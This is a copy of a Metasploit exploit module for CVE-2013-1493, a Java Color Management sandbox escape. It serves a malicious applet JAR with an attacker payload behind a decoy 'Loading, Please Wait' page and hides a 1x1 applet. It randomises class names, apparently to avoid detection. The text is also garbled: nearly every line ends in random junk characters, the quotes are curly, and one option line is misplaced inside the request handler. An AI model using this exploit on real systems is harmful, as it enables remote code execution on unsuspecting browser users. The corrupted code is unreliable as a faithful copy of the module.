##
6 z3 {/ b3 }. r6 F
7 p3 x( x; J* j+ b7 C( O: n% R8 b# This file is part of the Metasploit Framework and may be subject to' b2 ]6 z7 ]2 o& w# \' [; c: x
# redistribution and commercial restrictions. Please see the Metasploit5 b* m2 ^4 N) f, j, O }
# web site for more information on licensing and terms of use.' z b% ]) O2 A. d# c; D
# http://metasploit.com/
" Z/ Q2 \& Z; C2 O4 ^: L1 X- u8 ~##7 L$ \; O- B0 U9 F) j5 d7 S
require ‘msf/core’! b q: S5 `9 Z2 r8 g8 \; d
require ‘rex’
' c" J) i- u+ o% F6 i! Q* c2 {class Metasploit3 < Msf::Exploit::Remote
: N1 x% k! c8 @: bRank = NormalRanking
! @4 V, y4 W. minclude Msf::Exploit::Remote::HttpServer::HTML0 G% ^ h8 T" k% a6 h
include Msf::Exploit::EXE* t/ U' h4 t+ A& Y" l
include Msf::Exploit::Remote::BrowserAutopwn
7 e% V' ~. W$ [% vautopwn_info({ :javascript => false })
7 n3 P9 ^/ L7 M. Zdef initialize( info = {} )
+ b1 z0 T0 A7 Q$ A/ I$ I( esuper( update_info( info,$ \, `# F# s3 g' U' j, h3 F+ D
‘Name’ => ‘Java CMM Remote Code Execution’,
4 I+ o0 @! U) k‘Description’ => %q{
* {1 o* S. ]+ O) j# \3 Q; {This module abuses the Color Management classes from a Java Applet to run
* x5 {; M6 i9 S- i! _( zarbitrary Java code outside of the sandbox as exploited in the wild in February
/ H# I# X0 | y3 N3 ?9 f/ S* Zand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41& T, l: E5 X/ Q
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
# X; w1 @. q: K& T% @9 L6 hsystems. This exploit doesn’t bypass click-to-play, so the user must accept the java" c X( L' o9 g. N g
warning in order to run the malicious applet.% I; Z1 S4 y+ }4 e1 L* \. d+ H' h3 @
},
+ @- t" {) \& e7 a$ G‘License’ => MSF_LICENSE,
: o. M) c; L7 [/ ^( ?/ _‘Author’ =>
5 S" [: d+ _, S% {'Unknown', # Vulnerability discovery and Exploit4 \$ {% ?1 B" `7 ?2 [: Y% u
'juan vazquez' # Metasploit module (just ported the published exploit)3 c; \4 }+ U- n* R- }
],
8 F# _# O0 w+ G‘References’ =>
1 s3 W" i7 v$ \0 d7 g[
( O0 Q8 T) b3 }; K3 ~! E[ 'CVE', '2013-1493' ],
# @* K; T, I/ }- E, t[ 'OSVDB', '90737' ],
$ |0 X3 g7 E F1 W* U5 i6 P0 S[ 'BID', '58238' ],$ s+ e" u" A! q1 w6 w
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
& Z# L0 n0 P i7 g- r[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],0 G6 e2 Q7 P9 t0 M4 [ A7 K0 z9 y
[ 'URL', 'http://pastie.org/pastes/6581034' ]
/ S8 f: d) ` ?. r7 G3 O],9 i" M/ M/ a# {# j7 [/ x* S* x4 o
‘Platform’ => [ 'win', 'java' ],( ~( S. c" O- r! g4 N. y, U
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
3 J1 S0 |' c! c, t- C) d9 R‘Targets’ =>
' A8 h. g: A( O2 T8 x5 X[0 O I% ^$ P' {8 W- n. {4 A! G
[ 'Generic (Java Payload)',
* i& n2 h9 a5 J1 C4 G, `/ N% F{7 y# N% Z' G8 ^$ [7 a+ v- ?
'Platform' => 'java',
; {" \* h( `; z8 v6 ~'Arch' => ARCH_JAVA7 b* r3 Z1 n5 m" @$ S, K
}: t% X# ^0 C. K- t! U. G/ L1 ]
],# k, g, d6 m# |$ }1 g6 A! S
[ 'Windows x86 (Native Payload)',
9 U- Y7 H% d! |( R5 p+ ?' a{
* q6 m! `; d. O0 H7 C'Platform' => 'win',
5 x3 f& N8 M2 E% S; L2 G+ {'Arch' => ARCH_X86 {% y$ A" h5 p
}
. h/ \6 ?; a% B% k" ~. c] w7 g4 a) w7 y9 F* l
]," d7 p. s8 `7 P7 ^2 r
‘‘DisclosureDate’ => ‘Mar 01 2013′
# R4 g. i% ^- y6 E))6 ~% d; K7 }- R" b- ^& X& }; A
end- r B" q5 h! G
def setup2 R+ C6 Q% H& y# t
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)4 L% e2 l& S' k# r; `$ R
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }" h1 n, W; V) Z% H$ l, S2 d
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)5 U* p2 A5 |! `# _7 @/ w
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }# `4 `& |4 u) k1 e; @, v
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”), n3 Y4 I1 H: ?: S& J! Y7 D l; v
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
! c! Q3 k! e: f& bpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
1 z, E9 V) H% Z* r2 m* }3 G) Y/ Y@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }, r& P$ p/ ^. A( D
@init_class_name = rand_text_alpha(“Init”.length)4 A6 M; q w) b& n+ w- [
@init_class.gsub!(“Init”, @init_class_name)0 E1 d8 m3 Q/ t* z1 @- i P( m
super1 [% i& l4 M# I6 H. r1 Q; C; {
end6 t1 G; `1 x6 S( P. c2 W$ j! o/ i
def on_request_uri(cli, request)3 W o% x8 i, n( N* K
print_status(“handling request for #{request.uri}”)' P+ L$ t9 R$ D3 U
case request.uri
* Q8 E2 `; O z: G) jwhen /\.jar$/i& k' j9 M- [- ?& q6 m- P% ^
jar = payload.encoded_jar5 [+ |% w7 R N
jar.add_file(“#{@init_class_name}.class”, @init_class)
S7 c5 G9 O& ]- D9 Y. h! pjar.add_file(“Leak.class”, @leak_class)( n/ \) |5 d, _* E2 J( h! k* B4 V
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)6 e8 C0 H6 n8 K
jar.add_file(“MyColorSpace.class”, @color_space_class)! O( }! K' F5 a/ Y- r8 B2 x
DefaultTarget’ => 1,
1 @8 E/ T3 n+ b6 x/ ^& bmetasploit_str = rand_text_alpha(“metasploit”.length)
' s$ [" l \# ^! apayload_str = rand_text_alpha(“payload”.length)+ k# D- N, k) P L( Q$ N
jar.entries.each { |entry|
" i! N% Z$ Q! w, z4 mentry.name.gsub!(“metasploit”, metasploit_str)
. o" r1 U+ I; ~- M" n0 oentry.name.gsub!(“Payload”, payload_str)9 w3 L2 O2 q3 ~- S3 H) J' P
entry.data = entry.data.gsub(“metasploit”, metasploit_str)
( I% K* r: s- _9 ^entry.data = entry.data.gsub(“Payload”, payload_str)) y! s. \5 O d7 V8 i A5 X
}, S- R. O' l6 ^7 P% n
jar.build_manifest
% o! W# Y4 E7 O8 b3 ksend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })5 M2 r0 V0 I, s
when /\/$/4 d5 B W2 _1 \1 j. ^/ x3 e
payload = regenerate_payload(cli)
3 _2 i9 Z5 g( h9 d1 A* y& Z$ eif not payload
% C: O: d6 z" }; E7 \& Rprint_error(“Failed to generate the payload.”) c2 Y* N0 T. c5 j ?: D5 n
send_not_found(cli)
. P- L0 e, j, Nreturn
9 d' _% q# Y- |! hend
# v! S1 o+ o( g7 a+ v! A7 W* Esend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })% `; r' M6 W7 M( ^7 f
else
! f3 S7 K+ ?4 W" s, N/ `0 O+ C* @send_redirect(cli, get_resource() + ‘/’, ”)
/ u$ t5 x# J" C8 e8 Lend: L; ?: _1 x: v U' f! x$ W/ G
end
9 U% M8 {" v+ `5 c2 E7 I& s, X! x, Ldef generate_html$ B) B% S2 |" V1 p- q* R( T
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
. s' u% {8 k) Z5 O, {/ D' C7 v& {html += %Q|<body><center><p>Loading, Please Wait…</p></center>|( k& \6 Z+ X+ ^3 C$ w
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
6 c9 g! a6 ]4 N' e" qhtml += %Q|</applet></body></html>|+ x5 Y" x6 P/ o5 [ o& z- Q1 S
return html4 o" ~+ c% a0 e
end: g) i$ ? B3 A0 w2 Q% G, W
end
* V! |4 Y6 E% E1 gend
. C/ l, u' X9 b$ I |